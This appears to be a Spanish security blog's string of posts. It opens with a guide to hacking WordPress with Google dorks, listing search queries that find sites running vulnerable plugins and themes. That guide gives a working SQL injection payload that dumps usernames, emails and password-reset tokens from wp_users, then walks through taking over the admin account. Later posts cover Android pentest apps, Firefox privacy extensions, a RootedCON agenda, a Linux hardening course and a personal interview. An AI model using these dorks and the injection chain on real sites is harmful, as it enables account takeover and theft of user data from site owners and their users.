Como hackear WordPress usando Dorks en Google

Hola a tod@s

Wordpress es sin duda el CMS más popular y usado por los usuarios de la blogosfera, por ello también es el más atacado debido a los miles de plugins y temas disponibles para WordPress.

Lo primero que se realiza es la parte de enumeración y como encontrar sitios que utilicen Wordpress y los plugins que utilizan.



Encontrar sitios con Wordpress:
  • intext:"Proudly powered by WordPress. "
  • intext:"Powered by WordPress. " 

Ver plugins instalados:
  • inurl: /wordpress/wp-content/plugins/

Es hora de buscar algunas vulnerabilidades conocidas:
Listado de directorio
  • "index of" inurl:wp-content/
  • "inurl:"/wp-content/plugins/wp-shopping-cart/"

Una de base de datos
  • "inurl:wp-content/plugins/wp-dbmanager/"

Wordpress theme Doraa XSS Vulnerability
  • Themes by Bons.us

Wordpress theme Dosimple XSS Vulnerability
  • "Theme by domainagan.com."

WordPress WP Symposium Plugin Cross Site Scripting
  • "/wp-content/plugins/wp-symposium/"

WordPress mTheme-Unus Local File Inclusion
  • ilnurl:/wp-content/themes/mTheme-Unus/

Wordpress Better-wp-security Plugin Remote Code Execution
  • inurl:wp-content/plugins/better-wp-security

WordPress U-Design Theme 2.7.9 Cross Site Scripting
  • inurl:/wp-theme/u-design/

 Wordpress Plugin easy-comment-uploads File Upload Vulendrability
  • inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php


WordPress Category and Page Icons File Upload
  • index of "/wp-content/plugins/category-page-icons/"

 WordPress theme parallelus-salutation Arbitrary File Download Vulnerability
  • inurl:themes/parallelus-salutation/ OR inurl:themes/parallelus-salutation/framework/

WordPress Auto-ThickBox-Plus XSS Vulnerability
inurl:"/wp-content/plugins/auto-thickbox-plus/"

Wordpress "Js Support Ticket" File Upload Bypass Extensions
inurl:/js-support-ticket-controlpanel/

WordPress Appointment Booking Calendar 1.1.24 Escalation / XSS
Index of /wordpress/wp-content/plugins/appointment-booking-calendar/

WordPress Appointment Booking Calendar 1.1.24 SQL Injection
  • Index of /wordpress/wp-content/plugins/appointment-booking-calendar/

Wordpress clikstats plugin Open Redirect
  • Dork: inurl:"/wp-content/plugins/clikstats/ck.php?"

Arbitrary File Upload: Easy Comment Uploads - Version - 3.2.1, usamos la siguiente dork:
  • inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

Stored XSS: Versión 3.2.3, usamos la siguiente dork:
  • inurl:/wp-content/plugins/count-per-day/notes.php

Arbitrary File Upload: Custom Content Type Manager, usamos la siguiente dork:
  • inurl:/wp-content/plugins/custom-content-type-manager/upload_form.php

SQL Injection: Wordpress HD Webplayer - Versión 1.1, usamos la siguiente dork:
  • inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=

[Full-disclosure] WordPress <= 2.8.3 Remote admin reset password. Con este obtendremos el user_login y user_email de la siguiente manera:
  • /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users

Una vez obtenido el usuario o e-mail nos dirigimos a www.sitio-web.com/wp-admin y seleccionamos en ¿Olvidó su contraseña? introducimos el usuario o e-mail.
Presionar en "Get New Password" la cual el sitio web enviara un token, dicho token se almacena en la DB, por lo tanto se obtendrá dicho código de la siguiente manera:
  • /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,1​0,11 from wp_users

Obtenido el token, sólo faltaría restablecer la contraseña, para ello nos dirigimos al siguiente link:
http://www.sitio-web.com/wp-login.php?action=rp&key=Token&login=Usuario
Remplazamos el token  y usuario por lo datos que nos arroja la DB, por ejemplo:
http://www.sitio-web.com/wp-login.php?action=rp&key=JAr7W8letkza&login=admin
Por lo que lograremos la opción de restablecer la password fácil, fácil y con fundamento.

Full Path Disclosure (FPD), usaremos la siguiente dork:
  • inurl:"/wp-includes/

Wordpress Formcraft Plugin File Upload Vulnerability
  • intext:"powered by formcraft", inurl:plugins/formcraft

Wordpress Smallbiz Themes Remote File Uploads Vulnerability

  • inurl:wp-content/themes/smallbiz/palette/index.php

No seáis malos.

Más herramientas para tu arsenal pentest en Android

Ya os hemos hablado en otras ocasiones sobre herramientas en Android enfocadas al pentesting que hay en la actualidad. Entre ellas existen auténticas "suites" completas como Bugtroid (enlace PlayStore) presentada en este post, o incluso os enseñamos el Pwn Phone en este otro post

Por supuesto tenemos la más famosa de todas, dSploit, cuyo desarrollo se perdió pero surgieron magníficos forks como cSploit (enlace GitHub) que añade nuevas funcionalidades, y zANTI.

También aprovecho para recordar uno de los mejores capturadores de paquetes de red: Intercepter-NG, que incluye un mini-Wireshark y permite ataques MITM, SSL stripping y captura de cookies.

Mientras actualizaba mi arsenal de herramientas para pentesting desde Android he descubierto un par más que desconocía hasta ahora. Se trata de dos aplicaciones enfocadas a realizar ataques de SQLi.

SQLMapChick: (Play Store, GitHub)
Esta App consiste básicamente en un GUI de nuestro querido y conocido SQLMap. Su funcionamiento es muy sencillo al hacer uso de botones para elegir las opciones que quieres incluir en el comando a ejecutar.



DroidSQLi
Esta App puede descargarse desde la web del autor directamente en un APK. No he conseguido averiguar si está disponible su código fuente de forma pública pero la incluyo porque la encontré gracias a un enlace que vi pasar por Twitter hace tiempo.
En el mismo enlace anterior podéis encontrar un video-tutorial (inglés) de uso de la herramienta con un ejemplo práctico.

Bonus
Nipper: Escáner web para analizar de manera general un CMS (WordPress, Drupal,...), y listar los plugins instalados con sus versiones y vulnerabilidades asociadas. 

Mac Address Ghost: Utilidad para cambiar la MAC de tu Android.

Saludos!

Recopilación de extensiones de Firefox para mejorar tu anonimato en Internet

Hola a tod@s

Ya hemos hablado en el blog sobre el tracking email, el tracking en los sistemas operativos, en especial Windows 10, las supercookies y os hemos dado unas recomendaciones sobre cómo mejorar tu privacidad de tu navegador sobre todo en webRTC.

En esta ocasión traemos unas extensiones para Firefox que nos será de gran utilidad para mejorar el derecho a la privacidad y a ser anónimo, veamos:

Di adiós al tracking con Disconnect: Este fue fundado por ex ingenieros de Google en 2011. Esta extensión es open source y también mantiene tus búsquedas en privado. https://addons.mozilla.org/en/firefox/addon/ublock-origin/

Bloquea los anuncios con uBlock Origin: Es un bloqueador ligero y eficiente, a diferencia de AdBlock Plus lo bloquea todo, sin distinciones.  https://addons.mozilla.org/en/firefox/addon/ublock-origin/

Dificulta el fingerprint de tu navegador con Random Agent Spoofer: Esta extensión cambia de forma aleatoria el user agent del navegador.                                          https://addons.mozilla.org/en-US/firefox/addon/random-agent-spoofer/

Elimina de forma automática las cookies con Self-Destructing Cookies: Elimina las cookies al cerrar el navegador de forma automática, como las cookies persistentes.                        

Cifra siempre con HTTPS Everywhere: Se trata de una extensión que cifra tus comunicaciones, haciendo tu navegación más segura. Una colaboración entre el proyecto Tor y la Electronic Frontier Foundation.                                                                                     

NoScript, Una extensión muy conocida por todos: Permite configurar javascript sólo en sitios web de confianza.                                                                                   

Control de contenido con Policeman: Tiene una finalidad similar a NoScript. https://addons.mozilla.org/en-US/firefox/addon/policeman/



PrivacyBadger: Similar a Disconnect, protege su privacidad por bloqueo anuncios espías y trackers invisibles.                                           https://addons.mozilla.org/es/firefox/addon/privacy-badger-firefox/

BetterPrivacy: Es de los pocos que es capaz de destruir "super-cookies" (cookies dentro de Flash que el navegador no controla).          https://addons.mozilla.org/es/firefox/addon/betterprivacy/



¿Y ustedes conocéis más extensiones para mejorar la privacidad y anonimato?


No seáis malos. 

RootedCON 7ª Edition

Hola a tod@s
El próximo 3, 4 y 5 de marzo podremos disfrutar en Madrid de una nueva edición de RootedCON, ya en su séptima edición. Parece que fue ayer cuando en el año 2010 un grupo de entusiastas fundo la Rooted. Un congreso de seguridad informática cuyo propósito es el promover el intercambio del conocimiento ente la comunidad hacking, estudiantes, entusiastas, profesionales y cuerpos y fuerzas del estado, todos han tenido y tienen cabida. 



Este congreso se ha convertido sin duda, en unos de los congresos más importantes de Europa, por la calidad de las charlas de sus ponentes. El crecimiento de esta CON no tiene límite, ya que no sólo se conformaban con la edición Madrid, por ello se abrieron camino en el levante español, con la Rooted Satellite durante dos años seguidos en la ciudad de Valencia. Este año nos ha sorprendido a todos con el anuncio de la “Rooted Internacional”  este mes de junio se celebrará la RootedCON Hong Kong teniendo un nivel similar a la Black Hat Asía.

Centrémonos en la que nos ocupa en el día de hoy. Este año en la RootedLabs tenemos disponibles los siguientes labs:
  • Pablo González - Metasploit on fire! (29/02/2016)
  • José Luis Verdeguer - Sistemas de VoIP (Securización & Hacking) (29/02/2016)
  • Pedro Sánchez - Análisis forense en Windows (01/03/2016)
  • Daniel García 'cr0hn' - Hacking de redes con Python y Scapy (01/03/2016)
  • No olvidéis de los Bootcamps:
  • Corelan ADVANCED Exploit Dev Training por Peter Van Eeckhoutte
  • Counter Threat Intelligence Bootcamp por Jorge Capmany y Manu Quintans
  • Practical Wireless & Radio Hacking Bootcamp por Raul Siles

¿Estas desarrollando o has desarrollado herramientas de seguridad  no comerciales y quieres compartirlas con la comunidad? Pues la Rooted Warfare es tu sitio.

Este año como bien no tienen acostumbrados la organización tendremos una diversa y amplia gama de charlas, con las últimas investigaciones realizadas por amigos y compañeros del gremio.

Ponentes:
  •     Matias Katz - Hardware Backdooring X11 with much class and no privileges
  •     Jorge Hurtado - Estupidez de las amenazas en la época del “Threat Intelligence”
  •     Raúl Siles - La cena de los idIoTas
  •     Daniel Martínez - Whatsapp y El Abusón de las features. Hoy Cinecito
  •     Abel Valero - Windows BootKits: Cómo analizar malware persistente en MBR/VBR
  •     Alfonso Muñoz - Cryptography with brainwaves for fun and... profit?
  •     Rafa Sánchez and Francisco Gómez - Esta noche, en Cuarto Milenio: Escaneando     Internet     en IPv6...
  •     Andrés Tarascó - Tracking satellite TV piracy
  •     Daniel García - Broker & MQ injection
  •     Pablo San Emeterio and José Miguel Cañete -
  •     Elías Grande - Odin: Footprinting en la era del BigData
  •     Pedro Cabrera - All your bebop drones still belong to us: drone hijacking
  •   Ricardo J. Rodríguez and Laura García - A Journey through iOS Malware Landscape:      Evolution & Characterization
  •     José Picó and David Pérez - Atacando 3G Vol. 3
  •     Hicham A. Tolimat - Hitch's Hacker Guide to Docker


No os la perdáis os arrepentiréis!


Mas info aquí.

Curso Hardening Servidores GNU/LINUX



Hola a tod@s
¿Administras servidores GNU/Linux y te preocupa la seguridad? ¿Han vulnerado tus sistemas y no quieres una segunda vez? Pues estas de suerte ya que el próximo 26 y 27 de febrero tendrá lugar en Madrid un curso en el que podréis fortificar vuestros servidores o deseen reforzar conceptos. 



El curso Hardening Servidores GNU/LINUX será impartido por Lorenzo Martínez, CTO de Securizame con una amplia trayectoria profesional en seguridad informática, garantía de curso de calidad.
El contenido del curso es amplio y completo para fortificar y mantener una buena defensa en profundidad.

Contenido:
- Orígenes de GNU/Linux
- Arquitectura: Elegir el sitio ideal
- Viaje al Interior de Linux
- Diferencias entre Kernel 2.X y 3.X
- Seguridad desde la instalación
- Sysctl: Ajustes de funcionamiento del kernel
- Medidas de seguridad adicionales
- Usuarios y grupos
- TCPWrappers
- Xinetd
- Las redes en Linux
- IPTables
- Módulos PAM
- Los servicios
- OpenVPN en profundidad
- Hardening BASH
- Hardening SSH
- Honeypot con portsentry y Fail2Ban
- SELinux
- White Box Auditing Tools
- Monitorización y troubleshooting

Lugar: Plaza Villafranca de los Barros 2, Madrid.
Fecha y Horario: viernes 26 de febrero 16:00-21:00 y Sábado 27 de febrero 9:00-14:00.
Precio: 150€ Curso exento de IVA.


No lo pienses más plazas limitadas!

Un Minuto sin 01 con Omar Benbouazza



Hola a tod@s

Hoy en un minuto sin 01 nos visita Omar, conocido por todos por ser miembro de la organización de la RootedCON, también ha trabajado en grandes empresas como Microsoft y actualmente trabaja como senior security specialist en Basware. 


Aprovechar la ocasión para recordaros que el 3,4 y 5 de marzo tendrá lugar una nueva edición de la Rooted.




1º ¿Quién es Omar? 
 Soy un tipo con inquietudes y fanático del Trivial. Pasé la infancia a orillas del Mar de Alborán, la juventud en la Meseta Castellana y ahora disfruto de unos maravillosos paisajes del Mar Báltico. Disfruto haciendo lo que me gusta, trabajando en temas de hacking y seguridad, y organizando RootedCON.

2º ¿Que sueles hacer cuando tienes tiempo libre? 
Mucho de mi tiempo libre lo dedico a proyectos en los que estoy embaucado, como RootedCON, mi pasión desde hace ya varios años. También le echo horas a proyectos que tengo con amigos.
El resto del tiempo me gusta disfrutar de la naturaleza, hacer deporte, leer y ver una buena película. El invierno de Finlandia ayuda a seleccionar buen cine, e iniciarte en el esquí de fondo.

3º Si no hubieras sido informático, ¿A qué te hubieras dedicado? 
De pequeño quería seguir los pasos que había dado mi padre, ser piloto, pero la miopía lo impidió. Nunca me había planteado ser informático, lo veía como un simple hobby. Yo iba para Ciencias Políticas y Economía, y tampoco me he alejado mucho de ello :) La política y sobre todo la política internacional son mi pasión.

4º El último libro que has leído. 
Realmente soy un bicho raro… leo varios libros a la vez y salto de uno a otro. Los últimos han sido “Los hombres que susurran a las máquinas” de Antonio Salas, “Las alcantarillas del poder” de Fernando Rueda y “Occupy” de Noam Chomsky.

5º Tu plato favorito. 
No soy nada aficionado a la gastronomía. Me gustan unos sencillos huevos fritos con patatas o unos boquerones en vinagre.

6º El último sueño raro que tuviste. 
Soy malísimo para eso, no suelo recordar los sueños.

7º ¿Qué música sueles escuchar? 
Un poco de todo, pero tengo fijación por Mike Oldfield y Jean-Michel Jarre.

8º Lo último que piensas antes de dormirte. 
Hago una lista mental de las tareas que tengo que hacer al día siguiente. Y revisar varias veces si he puesto la alarma para despertarme :)

9º Lo primero que piensas cuando te levantas por la mañana. 
Hoy qué toca para ir a la oficina? Bus, bici o coche?


10º Lo primero que harías si fueras presidente.
Obligar a las multinacionales a pagar impuestos en nuestro país. Impulsar una educación seria, moderna y sobre todo gratuita para formar en condiciones a las próximas generaciones. Luchar para que los pobres sean menos pobres.